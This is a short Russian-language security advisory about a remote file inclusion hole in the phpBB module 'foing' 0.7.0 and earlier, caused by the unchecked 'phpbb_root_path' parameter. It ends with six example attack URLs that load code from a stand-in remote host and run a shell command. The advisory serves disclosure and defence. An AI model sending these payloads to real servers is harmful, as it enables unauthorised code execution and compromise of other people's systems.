Программа: foing (модуль для phpBB) 0.7.0 и более ранние версии.
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценариях index.php, song.php, faq.php, list.php, gen_m3u.php и playlist.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://victim/[foingpath]/index.php?phpbb_root_path =http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/song.php?phpbb_root_path =http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/faq.php?phpbb_root_path =http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/list.php?phpbb_root_path =http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/gen_m3u.php?phpbb_root_path =http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/playlist.php?phpbb_root_path =http://evilcode.txt?&cmd=uname -a